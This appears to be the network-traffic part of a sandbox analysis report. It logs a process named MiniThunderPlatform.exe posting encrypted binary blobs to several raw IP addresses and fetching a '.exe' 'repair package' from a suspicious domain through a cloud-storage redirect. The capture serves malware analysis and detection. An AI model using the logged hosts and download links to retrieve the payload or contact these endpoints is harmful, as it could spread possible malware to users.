                                                                                                                                            Data Ascii: <~9tJH&&i%^HlVwYWH>x$uC7.gzuhH"uS57U6Fj[GM<T!G/(Bfo"5H)E")J@~
                                                                                                                                            Nov 6, 2024 16:40:28.582917929 CET294INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:28 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 140
                                                                                                                                            Data Raw: 3c 00 00 00 05 00 00 00 80 00 00 00 ae 7e 19 39 88 19 74 b9 b6 fc 4a 85 c2 48 da 14 80 eb 26 26 69 25 1a b4 5e 48 fd d6 f3 6c a3 bc 15 fa e0 f7 8d 56 17 9d 1a 1c 17 18 cb 11 c1 77 54 b7 af 04 96 b4 06 f3 d9 f8 05 99 5c 5e 09 08 48 61 41 7c 31 44 4a 81 1b ef 5b a5 d5 58 77 1b 48 61 41 7c 31 44 4a 81 1b ef 5b a5 d5 58 77 1b 24 5c fe 69 6e 6b 50 49 11 fe a4 78 be 70 a2 69 70 aa 3d 20 1d b9 43 86 14 4a 16 e7 4e 5b e5 ca
                                                                                                                                            Data Ascii: <~9tJH&&i%^HlVwT\^HaA|1DJ[XwHaA|1DJ[Xw$\inkPIxpip= CJN[


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.1057280116.132.218.191808156C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:28.593162060 CET1519OUTPOST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 1388
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 3c 00 00 00 11 00 00 00 60 05 00 00 bb c6 5d 98 b0 2f 57 e0 92 98 ac dd 0e 9a d2 5e c1 81 54 d0 30 51 33 7c 34 60 66 c4 a2 54 6f e1 0e 41 9b e1 ee a3 03 a7 13 82 01 59 b4 e9 26 05 9d 4c f2 a5 3f a6 47 33 f0 24 97 c6 90 e1 87 5f 57 01 ab af 83 e7 c0 95 04 2f da 2a dc a6 c2 b1 1a 40 25 c7 ff af 8a 26 2f da f1 83 4f db 5d 82 6c 70 2e 2e cb 1a b3 06 d4 a6 c3 24 df 4d 06 23 ae 43 88 2a f8 56 55 ae 98 d1 44 4c 8c bb fd b1 13 d9 3d cb 04 ef 96 2c 57 aa ad 7b 14 9c da cd 6f 6a bb 0d 78 ae ec e2 7c be c7 d8 5f 21 c8 9e 6c 08 8d b2 6e 8c a5 f6 54 54 c9 45 96 d8 27 82 a8 fa c0 43 99 bc 3f c2 86 ea 30 9b 86 8f 8a 10 05 13 06 2a ce 7d d7 d0 2e d2 69 ba c6 01 ee 3b b5 92 92 ff 20 14 c0 76 09 71 35 8f 8d 87 1b 47 e1 ed bb 39 44 a2 65 e6 5e 5b 9c 95 e6 17 78 dc fa 13 57 23 b6 17 d2 96 0e 8a 2c ec 9f 4d f2 f9 98 6b 3e 33 bf 16 ab 01 e3 a3 27 ba 6c 0d 7a 06 8e 57 af 00 41 49 c5 e7 34 87 2e f0 df ed a5 a6 3f f6 e5 24 ba 4b 47 fe d6 0c cc f0 3f df 9b 82 80 1f d6 e7 6f 10 2f 4c 9c 5d be 31 19 c4 ae c2 1a c0 6f 20 65 04 [TRUNCATED]
                                                                                                                                            Data Ascii: <`]/W^T0Q3|4`fToAY&L?G3$_W/*@%&/O]lp..$M#C*VUDL=,W{ojx|_!lnTTE'C?0*}.i; vq5G9De^[xW#,Mk>3'lzWAI4.?$KG?o/L]1o el/5+]? }L>x[X/M/2_iUZ)C!;I@c]!m8lL+5wt'R41bro>4!,NP~.X$2Di$A4W@m+2~%$,HJsV~0Yg|<$-Wj\R`MAn3#wYFmb$'L,Kn5*?d2wy~dRI$3*QRa2>VMC&%PHNw!kr`.~jhlp\XA;9oFwp5smA:/-)nv t.^.pK"$UGNJ"S$T-S|kg+H2-4zU@s+kXF]EMrLCgTVczGy7%&z?WAz4O-g@;<>qDyrO{(7vK"]:C~K$Z@\oKjzOY?_\H,glh [TRUNCATED]
                                                                                                                                            Nov 6, 2024 16:40:29.728199005 CET294INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:29 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 140
                                                                                                                                            Data Raw: 3c 00 00 00 11 00 00 00 80 00 00 00 bb c6 5d 98 b0 2f 57 e0 92 98 ac dd 0e 9a d2 5e c1 81 54 d0 30 51 33 7c 34 60 66 c4 a2 54 6f e1 0e 41 9b e1 ee a3 03 a7 13 82 01 59 b4 e9 26 05 ca a8 e2 02 e9 b5 85 33 65 f4 61 8d 80 78 e6 57 78 cb 2e d6 65 c7 b8 6c 67 f5 1f 71 19 c8 67 8f 78 cb 2e d6 65 c7 b8 6c 67 f5 1f 71 19 c8 67 8f 21 5a 26 28 81 6b 1b 6d bd c8 1e 16 10 41 de df 96 16 9a 7a 3c 34 bf a3 bb 23 43 b3 c7 c7 fd ef
                                                                                                                                            Data Ascii: <]/W^T0Q3|4`fToAY&3eaxWx.elgqgx.elgqg!Z&(kmAz<4#C


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.1057281116.132.219.22808156C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:28.880817890 CET172OUTPOST / HTTP/1.1
                                                                                                                                            Host: 116.132.219.22:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 44
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 41 00 00 00 09 00 00 00 20 00 00 00 5d af 3f 1b 47 de be fb 0e e3 c6 e2 e6 84 df 49 23 0a 9e f3 ce 65 b5 76 24 35 0c 0a a6 d4 fe c6
                                                                                                                                            Data Ascii: A ]?GI#ev$5
                                                                                                                                            Nov 6, 2024 16:40:30.022912025 CET144INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 28
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:29 GMT
                                                                                                                                            Data Raw: 41 00 00 00 09 00 00 00 10 00 00 00 3e 52 6f 75 15 18 37 51 a3 f0 b4 83 22 fa 63 82
                                                                                                                                            Data Ascii: A>Rou7Q"c


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.1057291140.206.225.136808156C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:30.376255035 CET1615OUTPOST / HTTP/1.1
                                                                                                                                            Host: 140.206.225.136:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 1484
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 3c 00 00 00 13 00 00 00 c0 05 00 00 25 5f 85 3a 4f 3e b6 87 5d ee 3a 64 1a 17 d6 74 8c ac 06 18 42 bd 0b c3 dc c7 09 71 16 d5 e1 31 45 fc 97 f0 79 ff bb 24 a9 4b e0 d5 f2 64 d8 c6 c7 1b 5b 11 4e 09 61 03 88 7c a6 4e 3d 56 d9 34 66 29 42 03 77 9e 70 1b a9 44 c3 63 d2 b8 0a 50 95 b4 90 1c 7e 97 b9 18 7a b5 5f 05 9f 54 f2 2b e9 e1 10 18 79 28 58 77 5d 68 a6 be a9 19 cc 4c 4b e5 13 20 67 fa 70 2f a3 8d 6b 8d 3b d4 7a d0 84 5c 62 3e 3a e8 d1 e9 08 0c 96 63 b8 56 f9 35 91 93 1d 98 b8 78 62 de a7 86 5e cc 2e cb 6e 31 b7 4a e8 b0 d5 63 75 72 2c 5e 27 9c 88 1a c6 53 64 47 14 d8 82 5a 44 a0 b7 1f 80 fd 1c 65 91 c7 9f 3a 11 d7 db 8b c8 c6 a0 76 bb a8 f6 d8 9c 98 46 e4 44 03 84 c9 0e a5 b2 c0 dc 12 3e ad e1 6e 90 a1 7a 57 c3 78 98 8d 71 b6 63 24 2b 3a 07 f6 a9 fb 9d e7 c9 f9 d4 25 99 6e 1b af b3 c1 83 b5 77 d7 70 f3 33 45 3d cc 39 fb 39 5f 90 80 d3 70 e2 fc 39 9d 6f 8b 97 69 93 4e fb cc dc fc b7 32 fe a0 ca ae db f4 93 68 aa 2f 64 aa 9b bb ae 72 c2 ff 95 f2 9e 01 c5 6d 54 81 1e 32 40 5b 84 96 df 00 3b 48 95 80 [TRUNCATED]
                                                                                                                                            Data Ascii: <%_:O>]:dtBq1Ey$Kd[Na|N=V4f)BwpDcP~z_T+y(Xw]hLK gp/k;z\b>:cV5xb^.n1Jcur,^'SdGZDe:vFD>nzWxqc$+:%nwp3E=99_p9oiN2h/drmT2@[;HaX4`Ga;i()0>WP#3dA7&@Hou5BdF?[(t.B$w*FcHM"Ci|'srAo6_"9QK+;shQ',xX(,A&LoVjdz@Y#}xPOOv^BYoXBdw6k0$6o+XVbe<*EP@[mhwiS@PA^F`T]wgmopzuR?#}Fa57'W<nl0jD!56jDa;y|zddRYPD)70BW2=AZgTJgbVIdzO4~5wa}&d4b|^/LC`Ndmrh4T4?Ay5Y}</sV5T1SflS6&fNz#7 =Ng68U2NVs>_5`6v,^%{ [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.1057300107.148.237.1805956C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:32.364953995 CET398OUTGET /d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_241019_1.exe HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-CH
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Host: skinx.x1.lolgezi.cc
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Referer: http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                                                                                            Nov 6, 2024 16:40:33.537075043 CET804INHTTP/1.1 302 Found
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:33 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 245
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                                                                            Location: https://download6.mcloud.139.com:443/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&dom=D930&rate=0&txType=0
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            X-Cache: MISS
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 36 2e 6d 63 6c 6f 75 64 2e 31 33 39 2e 63 6f 6d 3a 34 34 33 2f 73 74 6f 72 61 67 65 57 65 62 2f 73 65 72 76 6c 65 74 2f 64 6f 77 6e 6c 6f 61 64 53 65 72 76 6c 65 74 3f 63 6f 64 65 3d 54 54 49 78 52 44 45 78 63 55 46 78 57 55 73 79 5a 55 45 32 4f 44 51 78 4e 33 64 4a 64 45 46 35 51 30 74 76 26 61 6d 70 3b 75 6e 3d 44 35 32 30 44 38 41 44 43 33 38 34 39 36 34 45 33 30 36 41 46 31 41 41 33 44 45 45 41 46 34 34 41 30 35 39 36 46 36 43 42 35 43 38 36 30 30 46 45 35 36 30 44 33 44 41 39 38 39 32 43 33 32 42 26 61 6d 70 3b 64 6f 6d 3d 44 39 33 30 26 61 6d 70 3b 72 61 74 65 3d 30 26 61 6d 70 3b 74 78 54 79 70 65 3d 30 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                            Data Ascii: <a href="https://download6.mcloud.139.com:443/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&amp;un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&amp;dom=D930&amp;rate=0&amp;txType=0">Found</a>.


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.1057304140.206.225.136805956C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:33.173594952 CET498OUTPOST / HTTP/1.1
                                                                                                                                            Host: 140.206.225.136:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 368
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 88 58 03 26 20 4e 00 00 80 00 00 00 6f 21 a8 60 85 32 73 1e 4a 11 cf 48 7d 59 02 3d dd e3 7c 95 ba 6e 51 c8 5e df b3 14 ac 79 b0 04 64 36 b1 1f 70 6b a8 a4 87 fa 0a bb ea 05 76 ac 6e 59 5a 74 3f ec aa fe 17 59 67 be c0 80 01 94 63 85 b2 41 1a f9 44 5b a4 f9 92 59 d7 0c 47 2a fd a0 0d 58 b2 33 fa 93 c9 b7 24 1c 87 62 dd 6e 30 fa 2e b8 46 95 d5 f1 f4 81 82 71 0e 53 27 a1 d1 0a 01 ff 28 59 45 7e 89 03 99 63 22 78 34 a3 e0 00 00 00 9e f5 8f 05 e2 39 8b 18 8e 1a 67 84 a8 27 6c 82 36 ae 42 72 35 01 11 e0 87 db 31 2b b5 1d d4 8c e1 c9 0b d3 e6 57 6c 17 4d 60 8c 5e 5a 66 7a b5 e5 71 6c 99 43 6f 94 29 a3 04 62 62 48 8f d0 73 40 ae d0 41 e8 a2 d3 41 04 fe ec ee b5 d3 f4 a6 f6 e0 4c 8e a9 c1 1a 03 7a 7c d8 46 30 c2 1d 06 e5 16 db 29 17 24 10 45 9f 34 3f c8 3d 86 c3 37 20 9e 70 6f 3c 05 52 6e e5 07 66 17 99 d8 7e 3b fc f2 89 0a 6e 78 e7 96 14 8a 6d cc 5f 2f 39 89 e9 95 67 1d 6c 1f 83 d7 95 4b a2 7b 6f 4d 8f 84 82 79 88 53 84 d2 54 04 b8 55 39 46 eb 1e 77 74 07 91 2d 6b ff ee bf 72 25 66 d6 aa 7a bc 0d d3 00 27 [TRUNCATED]
                                                                                                                                            Data Ascii: X& No!`2sJH}Y=|nQ^yd6pkvnYZt?YgcAD[YG*X3$bn0.FqS'(YE~c"x49g'l6Br51+WlM`^ZfzqlCo)bbHs@AALz|F0)$E4?=7 po<Rnf~;nxm_/9glK{oMySTU9Fwt-kr%fz'G;n79_.ec9_aAn
                                                                                                                                            Nov 6, 2024 16:40:33.974281073 CET98INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 36
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Connection: Close
                                                                                                                                            Nov 6, 2024 16:40:34.188267946 CET36INData Raw: 20 00 00 00 17 5c 01 be c0 f8 71 c6 5b 23 17 9b 7f 1b 79 84 b2 92 d5 e4 49 82 bf 22 1f 75 17 32 a6 17 26 4b
                                                                                                                                            Data Ascii: \q[#yI"u2&K


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            10192.168.2.1057306116.132.218.191805956C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:33.552021980 CET482OUTPOST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 352
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 88 58 03 26 10 27 00 00 80 00 00 00 80 64 46 4a a0 ef b0 5b 42 16 67 ec 89 14 7d 20 c7 43 ff 93 72 2a 75 9e f5 cd dd af 97 2f 46 21 c9 a4 a7 55 77 a2 29 02 0f 06 56 ba 7e 77 15 82 71 cf f4 b6 8e eb 24 1c 5d 43 e6 9c 0c 33 0e 87 25 d1 e3 f1 d4 d0 71 ed c8 52 54 a2 36 d0 d7 27 80 bd 1b ce 91 a8 c0 93 18 e8 ff ee 08 1c 57 af 7e 47 ca ea fd 5e dd 0f af 09 c7 36 e3 62 bb 82 c3 71 97 75 90 73 57 c5 7b ef b9 cc f0 a6 81 a1 d0 00 00 00 1d 6a 8d 6c 65 53 b7 c3 c7 4c 86 ab 6d 7e 3a 01 00 06 5e ec 83 cb b0 b7 55 2d 07 90 1e 84 27 f2 fc 11 9e 23 c6 89 59 13 9a fa 61 29 3a 17 5f 8f de f9 0a c3 fa ab 71 0b 94 40 95 5a 8c ce 54 d9 48 b4 cf 5d 28 53 4c e8 74 aa 3e 7f ab 71 be dc e1 c3 1c 54 12 47 cc ae cf 2e cf 25 0c 56 20 7d 00 a2 47 83 ec 89 0f 24 2b ee 07 b9 1f 63 82 38 95 36 e2 8b 90 ea c1 e5 a0 b7 79 1d ec cf 2e cc 12 ba c2 ce be 9f fd a1 b8 f7 a0 d6 f4 46 e2 e5 bc 1f f7 7c 32 c3 5e 6a cf 1c 12 12 69 38 62 37 c3 20 97 62 f7 28 c2 76 f6 6f 5d d1 6e 95 3c 40 80 4f 02 dd 53 2c b0 2d 62 43 4c 26 ed 9f 64 ac dc 72 [TRUNCATED]
                                                                                                                                            Data Ascii: X&'dFJ[Bg} Cr*u/F!Uw)V~wq$]C3%qRT6'W~G^6bqusW{jleSLm~:^U-'#Ya):_q@ZTH](SLt>qTG.%V }G$+c86y.F|2^ji8b7 b(vo]n<@OS,-bCL&druWK @N
                                                                                                                                            Nov 6, 2024 16:40:34.683307886 CET302INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:34 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 148
                                                                                                                                            Data Raw: 90 00 00 00 ef 39 9f 1b e4 3d ff 80 72 d4 cb fb 66 72 ee 91 00 06 5e ec 83 cb b0 b7 55 2d 07 90 1e 84 27 f2 fc 11 9e 23 c6 89 59 13 9a fa 61 29 3a 17 5f 8f 84 2e c1 b5 72 a4 11 57 45 86 b6 ce 2a b5 a0 d0 6f 5c ce 5a d7 c1 f4 24 af f5 78 b3 99 04 d7 61 6c 90 74 fb 73 15 6d 07 ae 96 6c 95 d3 fa 81 16 c9 a8 fb e5 c4 d6 f8 a2 74 5f a9 3f 8b 3b a1 07 2d 15 96 d0 15 b5 1f e5 09 f5 89 32 a3 45 0d e7 26 86 3f 6b 27 3b 45 a8 aa fa c3 1e a6 19 bb da
                                                                                                                                            Data Ascii: 9=rfr^U-'#Ya):_.rWE*o\Z$xaltsmlt_?;-2E&?k';E


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            11192.168.2.1057307116.132.218.191805956C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:33.557415009 CET382OUTPOST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 252
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 3d 00 00 00 01 00 00 00 f0 00 00 00 e8 77 c7 8b 4a 2e 9d c0 e6 9f 60 9d 1a 49 b4 ea 99 de eb fb ac 60 4f ba d0 1a e1 3d 44 c5 0f 22 e8 53 5f 6f 59 e3 a8 03 2e f3 4e 36 27 e0 af fd 5b 86 33 00 92 ee d9 2a 21 4c 98 40 60 df 80 9b 04 69 a7 fe 77 e0 5c 89 8b 51 78 a6 58 6a 9d 85 00 3a 3f 45 62 52 6e 70 68 bb fa 16 76 26 db c8 84 6b 09 63 2f 91 12 1e ce 53 d6 88 ce 77 b1 a8 de f9 35 dc 8a c3 47 b4 10 55 bd b9 19 cf 35 ba a6 a9 c1 4b 4c ef d4 3f a4 78 8a 6f 9b 6e 58 bf a3 69 d6 ab fb dd 3d f4 33 0b 39 45 58 2a b6 9f 79 5b 53 fc dc 04 0d 6b 8f 83 ae d5 05 92 19 55 88 1b bd 10 9d 8f 6b 05 e3 98 6a ef 10 4f 52 74 40 0c cb 58 61 97 82 a8 bb a4 df b1 0b ed ac 71 a0 3e ff d6 6a 6b 95 54 9e d7 05 47 28 85 c5 9c c4 67 09 ff 61 66 95 b2 ac 01 48 46 f3 ae 68 71
                                                                                                                                            Data Ascii: =wJ.`I`O=D"S_oY.N6'[3*!L@`iw\QxXj:?EbRnphv&kc/Sw5GU5KL?xonXi=39EX*y[SkUkjORt@Xaq>jkTG(gafHFhq
                                                                                                                                            Nov 6, 2024 16:40:34.697499037 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:34 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 1804
                                                                                                                                            Data Raw: 3d 00 00 00 01 00 00 00 00 07 00 00 e8 77 c7 8b 4a 2e 9d c0 e6 9f 60 9d 1a 49 b4 ea 99 de eb fb ac 60 4f ba d0 1a e1 3d 44 c5 0f 22 e8 53 5f 6f 59 e3 a8 03 2e f3 4e 36 27 e0 af fd 18 3d 18 6b d7 f9 50 6d 99 34 51 08 4c ef 69 bc 35 95 c3 76 80 af 62 8e 04 99 38 26 34 74 b5 18 7a c7 c4 34 14 8c 61 7f 02 00 52 bc bd 01 ae 99 c4 2f 49 18 79 7d 98 57 5d f0 b3 05 5a 7b 4d b5 6f 64 c5 46 0b 65 2c 26 6c b4 78 34 83 fc d9 67 98 b7 06 c2 6d 97 f1 a3 16 20 31 34 77 8a 71 82 cf 74 18 04 26 c8 cf c7 7a 17 34 9f e1 97 13 9e a8 23 08 3a 62 7d ec 2b be f6 ba e0 c5 40 cd a1 98 1e 9c 0a 3c 1d c6 22 8b 9b d9 11 c9 12 37 95 4b c7 9d 0d 05 9c ae dc 47 a1 cc 8b be 69 f9 da 1c de f2 99 1d 99 a2 82 dd 7c 52 18 20 73 43 71 11 00 35 fb d5 1a bb e4 a7 df 0f 44 ec ba 36 c4 26 ab ef d6 63 56 91 55 8a 8a 2d e0 68 62 09 d6 12 93 db 5e 50 6f f0 1f f6 94 c4 16 96 fb c3 34 c7 5d 24 35 45 10 67 eb 73 3b a2 cf 59 bd 1c 68 bb 2f 56 72 72 13 aa b9 42 24 66 84 47 53 2b d5 ae 47 a7 56 89 b1 2e b1 d0 f5 62 61 1b c0 fb 19 34 3a ad 42 68 54 [TRUNCATED]
                                                                                                                                            Data Ascii: =wJ.`I`O=D"S_oY.N6'=kPm4QLi5vb8&4tz4aR/Iy}W]Z{ModFe,&lx4gm 14wqt&z4#:b}+@<"7KGi|R sCq5D6&cVU-hb^Po4]$5Egs;Yh/VrrB$fGS+GV.ba4:BhT<F|3}F"sCO$yldeT>,-`U2IV-vc+^mmXGc#*dv|uws]FEfsNd^m0pYTMPE=#fi0H~`6uDvA?Qj|O,PFWX,<_)E2`hH[I@E{v,ZBxpCB|cK|w)`iZ[&9DZ*r&mD5+<C76wp(2cj2y g*\>]4;`1lcv|XVf#[T[DqX^-lFOs(DQ%?824)Mdy*.fh([DORc~xVS)`mup:$l)y<xQ=O1Naj:GX>lI;bd:qR0S:B+Cb7i8Sd;E^;2.X_I=m1=KMe1xJ+{$!tty [TRUNCATED]
                                                                                                                                            Nov 6, 2024 16:40:34.697521925 CET723INData Raw: 08 57 b1 26 a6 38 1f c1 53 51 6c e5 cc e8 1e cf 7e 36 04 97 32 0e 89 cb 81 44 4e be d7 75 09 61 8c 36 8f 19 03 fa 6d ab 5f c0 ba b7 20 b6 48 a5 ad 2e 14 c7 ca 15 44 fb b1 0f ef c0 db 22 a0 f5 32 97 70 48 c3 3d d7 9d e1 34 a3 3a 1a a3 75 1b 9f 1c
                                                                                                                                            Data Ascii: W&8SQl~62DNua6m_ H.D"2pH=4:uD,|:6DU|<i!^'N6#&{xm/cgb7AvPq:R:w0IM^a'ON"^.`lx4+P^3re!?&iaQp`q$y
                                                                                                                                            Nov 6, 2024 16:40:34.806114912 CET254OUTPOST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 124
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 3d 00 00 00 0d 00 00 00 70 00 00 00 6b 7f 41 2d e6 83 23 fb fc 57 f4 cf e4 92 fa e1 fd 32 0c 19 96 52 8a 0f 63 ca 20 c8 79 17 ee 98 0e 40 b9 8c 5a 67 dd 84 99 cf ae b6 46 6d c5 fc bc 07 01 91 db f8 b8 3b 61 f9 19 a0 e2 84 ff d2 c5 77 90 18 79 36 f9 c9 0c 74 f2 dc ad 5e 00 db fc 13 3a 64 99 2a f3 d8 e1 c1 6c 39 81 9b 70 77 2a 5a 90 5c 31 f9 45 5e 94 1b 78 2a 0c ae 5a 51
                                                                                                                                            Data Ascii: =pkA-#W2Rc y@ZgFm;awy6t^:d*l9pw*Z\1E^x*ZQ
                                                                                                                                            Nov 6, 2024 16:40:35.196080923 CET719INHTTP/1.1 404 Not Found
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:35 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 537
                                                                                                                                            Connection: keep-alive
                                                                                                                                            ETag: "5e673b37-219"
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe <a href="http://nginx.org/r/error_log">error log</a> for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            12192.168.2.1057317116.132.218.191805956C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:34.811548948 CET690OUTPOST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 560
                                                                                                                                            Connection: Keep-Alive
